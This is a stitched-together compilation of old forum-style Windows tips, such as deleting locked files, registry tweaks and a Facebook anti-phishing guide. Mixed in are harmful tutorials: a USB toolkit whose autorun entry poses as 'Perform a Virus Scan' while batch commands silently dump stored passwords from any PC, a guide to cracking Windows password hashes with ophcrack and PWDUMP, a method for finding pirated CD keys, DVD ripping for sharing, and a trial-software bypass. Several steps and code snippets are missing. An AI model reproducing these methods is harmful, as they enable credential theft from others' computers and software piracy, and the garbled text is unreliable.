Delete An Undeletable File

Open a Command Prompt window and leave it open. Close all open programs. Click Start, Run and enter TASKMGR.EXE Go to the Processes tab and End Process on Explorer.exe.

Leave Task Manager open. Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL <filename> where <filename> is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager.

You can also try this:

Open Notepad.exe

Click File>Save As..>

Locate the folder where ur undeletable file is

Choose 'All files' from the file type box

Click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename

(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start

4. To move into a directory type: cd c:\*** (The stars stand for your folder)

5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1

6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.

7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Here is tutorial about how to create the password hacking toolkit:

NOTE: You must disable your antivirus when you doing this steps.
Download all the tools, extract them and copy only .exe files into your USB.

- Copy the files - mspass.exe, mailpv.exe, iepv.exe, chromepass.exe and passwordfox.exe into your USB Drive.
Create a new Notepad and write the following text into it:

ACTION= Perform a Virus Scan

save the Notepad and rename it to autorun.inf

Now copy the autorun.inf file onto your.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt

start chromepass.exe /stext chromepass.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are set to hack the passwords. You can use this
USB whatever PC you want. Just follow these steps

Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun USB).

In the pop-up window, select the first option (Perform a Virus Scan).

Now all the password hacking tools will silently get executed in the background. The passwords get stored in the .TXT files.

Remove the USB and you’ll see the stored passwords in the .txt files. This hack works on all windows.
- This procedure will only recover the stored passwords on the Computer.

How To Speed Up A Slow Computer

First off in the bottom right hand corner of your computer if you see alot of icons start up there when you first start your computer then this is for you if you dont know already how to get rid of em.

Press your Start Button (bottom left) and go to "run"

now type in: msconfig

now you will get a box that pops up and will tell you bunch of stuff dont mess with anything else other than what I tell you otherwise you could do something really bad (possible) go to your "startup" tab on the top right of the screen where it usually is and click it.

Now you will have a closed in box with bunch of filenames n addresses and more boxes with checks in them. Now if your like me you dont want anything startin up when you start you computer up or while your even doing anything cause it slows you down. Now unless your like me right now 1 have 1 thing starting up when my computer starts up and thats my settings for my overclocked vid card. But other than that uncheck every box and then hit apply and ok. Then window you were jus in will now close and ask you if you want to restart or wait till later to restart.

Either way when you shut it off and then turn it back on the settings will kick in

How To Remove and Add Right-Click Menu Items from Files and Folders

Removing Items

A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times, you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer visible!

Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at all difficult once you know the keys responsible for the additions.

For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the Root key, right here:

Now run (windows + r) and type regedit:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Click the the + sign next to the ContextMenuHandlers key, to expand it.
Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys you don't want.
Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid value by placing a period or dash in front of it.

Then exit the registry, refresh, and right click a file to see if the item was removed from the menu.
Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be removed by deleting or disabling their one context menu handler.

Note that the above key only applies to the right click menu of files.
To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys:

HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers
HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers

All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove.

Adding Items

Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use Notepad as an example of an item you'd like to add to the right click menu of all your files or folders.

For folders, go to this key:

HKEY_CLASSES_ROOT\Folder

Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the right-click menu). Now right click the new key you made and create another key named Command. Then, in the right hand pane, double click "Default" and enter Notepad.exe as the value.
Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu.

For files, go here again:

HKEY_CLASSES_ROOT\*

Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then right click the Shell key and continue on the same way you did for adding items to the right click menu of folders.

Once done, Notepad should appear as an option in the right click menu of all your files.

Ok, this is a little trick that i usually use to find cd keys with google.

if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

How does it work?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

these are all the required tools, there are ways with fewer items, but they produce very inferior outputs. Besides, after you get used to it, the whole process is really easy.

Okay, first and foremost, pull out Nandub. This is the step that takes the longest, as well as where you will make most of your decisions. I am going to assume that you are making a 1 cd rip. If you do what is in this faq, there won't be much reason to do anything else. Twisted Evil

First of all, run Nandub . It will pop up a dialogue box, and want to know if you are making a new project or resuming an old. New, of course. Give it a name and tell fairuse where you want it to store its data. Fairuse is about to rip the entire movie to your harddrive(nice if you want to go rent a movie and return it the next day).

Then it will ask for your DVD drive with a dvd in it. give it. Then, select which video stream you want. This is usually pretty obvious as the movie stream is the one that is an hour or so long. If there are two of these, check out the other tags. which languages and so on. worst case senario is that you have to trial and error. but that is rare. choose the long stream and hit next.

This is where Nandub rips everything to your hard drive. depending on the speed of various components in your computer, and the length of the movie, this could take a while. let it finish. and then move on.

Once all that is done, the really important screen pops up. this is where you set resolutions and video length. first, cut off the ending credits with the slider, but DO NOT mess with the beginning, as the sound and video frames need to start at the same point for sync. Then hit auto set for the cropping region, this is usually just fine. Then decide whether or not you want subtitles, which would be the subpicture stream. When you're done, hit next.

Set the field mode to IVTC. This will give you better quality for size, as it runs at 24 frames instead of 30, due to the nature of divx, there won't be any noticeable difference in quality, but 6 less frames to deal with each second(and to store data for) really add up. Besides this is the correct mode for all movies anyway. NExt.

This is where you set FINAL file size, including audio, for 1 cd rip, set to 690, for 2, set to double that. Then follow the directions they give you and choose a final resolution that has between a 120:1 and 150:1 (if possible, sometimes the movie is compression ratio. NEXT!

This screen is where you determine quality. The autoadd button is usefull, and will give you decent quality, with 4 encodings. What this does is encode the movie 4 times, and then mix the frames to creat the final encoding, with the most efficient possible encoding for each frame. which is how we get bad ass quality for a single cd. I usually go for 8 encodings, as on my athlon 1600+ this rarely takes more than 8 hours to do, so I just go to sleep, wake up, and its done.

Then add the audio encoding that you want.

Hit next.

And let the bastard fly. Depending on what you set, and your computer, this could take from a few hours to a few days. CPU's of 1.2Ghz+ are nice right about here. You can do stuff while this is going on, but it makes things take much longer.

In the end you will have a bunch of encodings in the folder you specified at the beginning, the 4+ you chose and the final. You will also have an AC3 stream. Take the final AVI and toss it someplace to await the rest of the audio work you have to do, and you can erase the other encodings, freeing up a few gigs in the process of space.

NEXT: AUDIO

Ok, this is where Besweet comes in.

Extract BeSweet and the GUI into the same folder. Now Run the GUI.

At the top there are three fields. One for BeSweet which you should point at the besweet.exe that you should have unzipped to the same directory you are running the Gui from, A field for the AC3 stream, which is in the folder where you sent the encoded video from Fairuse, and an output mp3. The output mp3 has to be an existing file, so make a text file, rename it whateveryouwant.mp3 and just say yeah, its cool to change the extension and make things weird. besweet will overwrite it so don't worry. point the third field at that file. The default values for stuff should be fine. but to make sure go to Azid 1(on the left) and select stereo, and then go to Lame 2 and select constant bit rate, and 128(assuming that is what you want). then click on besweet again, and finally, click on AC3 to MP3.

Let the bastard fly.

Now. When its done you should have an mp3 that is the entire soundtrack for the movie. This is where virtualdub comes in. run the virtualdub mp3 version. go to File:open video file and select the final encoding that you had from way back. Then go to audio and select mp3 audio. it will ask you for the file, give it the mp3. Go to audio again and make sure direct stream copy is selected. Then go to video and make sure that direct stream copy is also selected. Finally go to file again and SAVE AVI. give it a file name and let the bastard fly. This final file is your movie. Beautiful and glorious. Congratulations, its a DivX rip. Aren't you proud. burn to cd, and give copies to all your friends.

How to change your folders background

Step 1: Have the Folder you want to put the background on open!

Step 2: Open up Notepad, then simply paste in this code:

Now just close the folder and open it again it should show the picture as a background!

How to boot your XP faster

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:

2. From the Start menu, select "Run..." & type "gpedit.msc".

3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.

4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".

5. Click "OK", "Apply" & "OK" once again to exit.

6. From the Start menu, select "Run..." & type "devmgmt.msc".

7. Double click on "IDE ATA/ATAPI controllers"

8. Right click on "Primary IDE Channel" and select "Properties".

9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".

10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.

11. Reboot your computer.

WindowsXP should now boot REALLY faster.

How Long Has Your System Been Running?

Here's how you verify system uptime:

Click Start | Run and type cmd to open a command prompt.

At the prompt, type systeminfo

Scroll down the list of information to the line that says System Up Time.

This will tell you in days, hours, minutes and seconds how long the system has been up.

Note that this command only works in XP Pro, not in XP Home. You can, however, type net statistics workstation at the prompt in Home. The first line will tell you the day and time that the system came online.

Hide Drives and Partitions

Do you have data on a partition or hard drive that you don't want tampered with or easily accessible to other users? Well, you can hide any drive/partition .That means that they won't show up in Explorer or My Computer.

If you want access to that drive from your user account you should create a desktop shortcut before proceeding. Once hidden, you can still access by typing the drive letter and a colon in Start/Run—for example, "D:" will bring up a folder of the contents on your D drive.

The easiest way with Win XP is to use the TweakUI power toy from Mcft. Go to Start/Run and type in "tweakui" (without the quotes).

Go to My Computer/Drives and uncheck the drive/partition(s) you want hidden. Click "Apply" or "OK" when finished.

For Win NT, 2000, and XP you can use the following Registry edit:

Open the Registry Editor by going to Start/Run and typing in "regedit" (without the quotes). Find your way to...

Click on "Explorer".

Double-click the "NoDrives" key in the right column. If you don't find a "NoDrives" registry key, just right-click in the right pane and choose "New/DWORD Value" then name the key "NoDrives".

You'll see a value like "0000 00 00 00 00". This is where the fun starts. The four sets of double zeros (after the "0000") are where you'll enter the values for the drive/partitions. Now, stay with me on this—it's not as complicated as it sounds:

The first column is for drives A-H, the second for I-P, the third for Q-X, and the fourth for Y-Z.

The values for each drive are as follows:

So, let's say you want to hide drive D. In the first column you would put "08". For drive K you would put "04" in the second column.

But what if you want to hide more than one drive in a column? Simply add the values together: D+E = 8+16 = 24. So in the first column you would put "24".

Still baffled? If you have XP then go get TweakUI and save yourself the math.

Whichever method you use, you can rest easy knowing that the files on that drive or partition are less accessible to other users.

Cracking Windows Passwords

To crack Windows XP and Windows Vista passwords, we will use the

program called ophcrack. Ophcrack is a Windows only password cracker, and it
uses rainbow tables to get the job done quickly. It cracks passwords for both
Windows XP and Vista but it is more powerful on XP because Vista fixed the
security hole that allowed XP to crack passwords easily. Windows uses a couple a
couple types of hashes. One of them is the LM (Lan Manager) hash. If a password
is longer than seven characters, then it is split into seven character chunks, made
into all uppercase, and then hashed with the DES encryption. Because it is split
into parts and made all uppercase, the total number of different password
combinations goes down significantly, and makes it easier for hackers to crack the
password. The Windows password hashes are stored in a couple places:

In the C:\WINDOWS\system32\config directory where it is locked to all
accounts but the system account which you don’t have access to.

In the registry: HKEY_LOCAL_MACHINESAM where it is also locked for all
users.

So you might be wondering, how can I get a copy of those hashes? There are a couple ways.

• Boot from a Linux live CD and copy the SAM file onto a USB or floppy
disk.

• Use the PWDUMP program that comes with ophcrack to trick the
registry into giving up the hashes.

First download and install ophcrack, It's a free program. As you can see there are two

versions. In this example we will be using the program itself in windows, so download the first option. Once you have it downloaded, install it. When the option comes up to
download rainbow tables, unclick them all and just install the program.
It is better to download the rainbow tables separately.

Once it is installed, go to the ophcrack website and click on Tables in the
navigation. This will display all the tables you can download. As you can
see, the more characters covered, the bigger the table gets. Choose the
correct table for your operating system.

4. In the example, I chose the largest possible free table. Next run

ophcrack and click on tables. Select the table you downloaded and click Install to locate the file on your computer. Hit OK to continue.

5. Next we will be running PWDUMP to obtain the password hashes. Make
sure all of your anti-virus and anti-spyware programs are disabled
because most anti-virus programs mistake PWDUMP for a malicious
program since it accesses the system files. If you don’t disable the anti-
virus program PWDUMP will fail in retrieving the hashes.

6. Click Load and select Local SAM. This will load all the password hashes
for all the users on your computer and display them.

7. Next click Crack and the program will begin to crack the password
hashes.

8. Once the program finishes cracking, you should see a screen similar to
the following:

in a matter of a couple minutes.

Ophcrack LiveCD

The next method to crack the Windows hashes I will show you is through an ophcrack LiveCD.

1. Go to the ophcrack website and choose the correct operating system
LiveCD to download.

2. With the downloaded .ISO, create a LiveCD the same way you did with
the Ubuntu LiveCD in the Linux chapter.

3. Put the CD in your CD-Drive and restart to boot from the CD.

4. You will see the following screen:

5. Hit <ENTER> or wait six seconds to boot into the Ophcrack Graphic

mode. If something goes wrong and the screen won’t show the

Graphics, restart and go into the Ophcrack Graphic VESA mode. If this also fails, go into Ophcrack Text mode.

6. Once it ophcrack loads completely, it will automatically get your
Windows password hashes and begin the cracking process

There are a number of signs that can indicate that your Facebook account has been hacked. You might notice Status updates that you didn’t post or receive replies to Facebook messages you didn’t send. That might mean that your account has been hacked. Immediately change your password and make sure you’re using the advanced security settings.

A certain indication that your account has been hacked is not being able to log in. This happens when the scammer who hacked your account changes your password. You can’t change it back because you no longer know what it is. Some scammers will even reset personal information so you can’t verify who you are.

The Facebook team is dedicated to helping you protect your account. Facebook has built systems that look for and block suspicious activity, phony posts, and messages. Facebook also has a well-defined process if your account is stolen to help you shut down the scammer and recover your own account.

If your account is compromised, go to www.Facebook.com/hacked and ask Facebook to secure your account.

As soon as you report this, Facebook locks your account. While you can’t use it yet, the scammer can’t access it either. Facebook will then ask you to complete security check to unlock your account.

Facebook makes this pretty simple so follow their four-step process to reclaim your account.

Once you’ve recovered your account, be sure to set up advanced security features to add an extra layer of security to your account. In particular, be sure to enable secure browsing (https) and set login notifications so Facebook will let you know immediately when your account is accessed.

Scammers and phishers on Facebook

Addition to the run-of-the-mill scams you find all over the Internet, there are several scams that target social networking sites and Facebook users. These include Gaming App scams, Vanity scams, Facebook account thieves, Malicious script scams, and Clickjackers.

Avoiding gaming scams

About gaming App scams. I don’t mean you’ll be scammed by the App companies. They’re actually as much of a victim as the Facebook users who fall for the scams. If you’re an online gamer you already know you have to be careful not to fall for gaming scams. You already see offers for “cheats” and “hacks.” A lot of these things that promise to turn you into a great gamer are really designed to steal your personal information. But there are allways a good hacks and cheats. Per excample, something like ''100% REAL WORKING MAFIA WARSE HACK'' is a 100% fake! Download this stuf only from sites you believe. In contrast of games like Call of Duty, Battlefield series and many other a real hacks or cheats can be foundable.

Many phishing scams pretend to come from popular gaming sites. The danger isn’t using known third-party apps like Frontierville, it’s falling for phishers pretending to offer you game points or clues. The common scams offer prizes like free virtual objects. Other lures claim that your account has been suspended and provide a link for you to remedy the problem. Some of these scams will arrive on your Wall, but a lot will go directly to your email. Why? Numbers. Farmville has over 16 million players. Any spammer targeting a large email list with a phishing lure is bound to net a good number of Farmville players simply because there are so many Farmville players.

You may also see Wall postings like the previous one. Click on the link and you’ll be directed to a fake Facebook login page. If you log into the fake page, you’re giving your Facebook password directly to the scammer. How can you tell this is a phishing scam? Facebook will never direct you to the homescreen once you are logged in. This scammer also used a link shortening service for the this attack. While link shortening services are very helpful because they simplify very long URLs, the downside is that you may not know where they point to until you click. Use extra caution when clicking on these short links.

So how do the phishers trick you? In this radius of hacking I am not very good, i know only the base but I can tell to you some things. Phishers try to catch you off guard and hit you with the fake Facebook login while you’re actually using Facebook. The scammer might post a status update on your Wall that includes a link to something enticing. They might do this using an account they’ve stolen from one of your Friends so they gain your trust. The message will be something that will grab your attention. It might be scandalous photos, a sneak preview of a hot upcoming film, or a weird video. When you click on the link, you’re asked to log into Facebook again. Except that you’re not on Facebook anymore. The link actually takes you to a different website, so when you re-enter your Facebook login credentials, you’re handing them over to a phisher. Unlike the insanely horrible email scams written in poor English by scammers, most of the fake Facebook login screens are pretty believable.

This fake log-in screen above is recognizable ( for ex. www.Facebok.com). That’s a wellthought scam since most people automatically insert missing vowels while reading without even realizing it.

How do you avoid subtle scams like this one? Remember that Facebook will never contact you by sending you a Facebook message or posting a status message on your Wall. And, always look carefully at both the link in the address bar and links you click. If it looks suspicious don't click it. If Facebook does contact you, it will be via the regular email account that you provided when you opened your Facebook account. Always look at the link and don't click on it if it looks suspicious. Also, remember that Facebook only needs you to log in once each session. If you’re asked to log in again, it’s not Facebook.

Avoiding malicious script scam

Malicious script scam is one of the sneakier attacks being used on Facebook users. A common con using this attack method claims to allow you to see who’s been looking at your profile. This enticing scam tries to trick you into pasting text into your browser address bar.

The “unique code” shown above is the malicious script. While you’re being patient as instructed, the script is setting up your profile to spam all of your Friends.

In response to detecting these kind of attacks, Facebook added checks to help detect scripts being pasted into the address bar. So if you do paste a script, Facebook will ask you to confirm that you really want to paste that script, and even tell you why it’s a bad idea. Pay attention to these warnings. Don’t paste a script into your browser address bar unless you know exactly what it does and how. How do you avoid malicious script scam? Don’t paste a script into your browser address bar unless you know exactly what it does and how. Also give your Friends a heads up if you start seeing spam from them. Your Friends may be completely clueless that their Facebook accounts have been hacked. Let them know to change their passwords and how to recover a hacked account if needed. Avoiding clickjacking

Clickjacking is a technique used by attackers to trick users into clicking on links or buttons that are hidden from view. Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from view. You think you are clicking on a standard button, like the PLAY button on an enticing video, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. One form of clickjacking is to hide a LIKE button underneath a dummy button. That’s called Likejacking. A scammer might trick you into saying that you like a product you’ve never heard of in an underhanded bid to create viral marketing buzz. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed into liking Justin Bieber, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware. How can you avoid being jacked? Technologically, you can minimize your risk by staying current on browser updates. The browser companies are continually adding updates to shut down vulnerabilities that allow clickjackers and other scammers to operate. If you’re using Firefox, also consider installing the NoScript add-on. Beyond that, pay attention to what you’re getting and from whom. Would a college professor really share a post about watching hidden camera videos? If a post from one of your Friends seems suspicious, don’t click on it!

A suspicious post could be a sign that your Friend’s Facebook account has been hijacked or that your Friend has been clickjacked to like or share something without knowing it. If you know your Friends, you’ll know what those Friends really would like or share. That’s why one of your best protections against scams is not confirming Friend requests from people you don’t actually know.

Important! One thing tahts annoying me is post like '' share this page 77 times and you will be able to download scary movie 5'' or ''send 25 frinds this page on chat and you will get 1000 coins in Mafia wars''. That isn't dengerous but is annoying. When you shere some page xxx times, what will happen? NOTHING!!! Its a trick for stupid people thats fall for those.

Protect your account

Always Use a good password and keep that on your mind. Not only for facebook but for all internet sing ups. Creating a good password is fairly simple. You want it to be complex enough that it can’t be guessed, yet meaningful enough that you can actually remember it.

What is a good password?

First of all:

Don’t use it for ALL your accounts! Don’t share it with friends! Change it regularly! Consider storing it in a password tool!

A good password has at least eight characters, one or more numbers, at least one special character and at least one upcase letter. Use non-words but associate them with a word. Or go for something humorous you can remember. Per excample the best paswor would be something like '' ibNz#$jkF478LM_) '' but it is hard to remember. You must think for yourself and think out something. And always be sure to add a security question and your mobile phone number in the account settings of your Facebook account.

Log out

Log out of Facebook when you’re not using it is a simple and effective way to protect your account. Many people think that if they close the web page or exit the browser that also logs them out of Facebook. It doesn’t. The next person who goes to Facebook.com on that computer will find themselves already logged in—to your account. Logging out is crucial when you’re accessing Facebook away from home. But it’s also important at home if you share a computer. And remember, if you forget to log out of an active session, you can always remotely close that session from the account security section of the account settings page.

Identifying scams is trickier since messages appear to be coming from people you know and trust. So how do you spot a scam on Facebook? Let’s begin with a bit of context.

Online scams are moving targets. In the beginning, the obvious scams were email attachments from people you didn’t know. Then it was “Security alerts” from banks or credit cards. In this days it can also be a status update from a Friend asking you to watch a new video or visit an “awesome” website.

Conventional Scammers

Scammers hit Facebook for the same reason they target the rest of the Internet. They want access to your information, or your computer, or the money in your pocket. And sometimes they want to trick you into downloading malicious software to your computer. (rat or keylogger). The trick is to recognize the phishers, account thieves, and malware pushers.

Phishers steal personal information, often the data needed for identity. Phisher is an attempt to trick users into revealing personal information or financial data. You’ve already seen phishing scams in your email. On Facebook, phishers can try to scam you from multiple places—in status postings on your profile, in Facebook messages, and in Facebook chat. They can even send you regular email pretending to be Facebook or a popular App(Texas hold'em per ex.).

Account thieves try to trick you into logging into a fake Facebook screen in order to steal your Facebook login and password. This is why you should always check the address in your browser bar to make sure you are on Facebook and not some other unrelated site. ( per ex. www.facebook.facebook.com, www.facebook.007.com or some better www.Facbook.com , www.Facebok.com etc.)

They might want to sell your information, or to scam your Friends. People are far more likely to fall for a scam when it comes from someone they trust, like a Friend.

Malware pushers want to install destructive software on your computer. That malicious software, or malware , is designed to harm your computer or steal personal information. That malware might do a number of nasty things. It could
install spyware to log your keystrokes and collect financial account numbers and passwords. Or even lock up your computer unless you pay a ransom. How do malware pushers target Facebook users? You’ll be presented with an offer to download and install new software on your computer. It might be a new game, a digital photo organizer, a digital music player, or any other useful piece of software. Before you download any “free” software, always ask yourself who made it and why it might be free. If it feels a bit dicey, don’t download it and always be sure to update your antivirus!

How to use a trial program forever without activation

In this post I’ll show you how to “hack” a Software and run the trial program forever. Most of us are familiar with many software's that run only for a specified period of time in the trial mode. Once the trial period is expired these software's stop
functioning and demand for a purchase. But there is a way to run the software's and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to “hack” the software and make it run in the trial mode

forever, we have to understand the functioning of these software's. I’ll try to explain this in brief.

When these software's are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date
will not solve the problem. For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.

It works with Windows 2000, XP, 2003 and Vista.

Follow this tips carefully

You have to follow these tips carefully to successfully “hack” a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this “hack” may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.
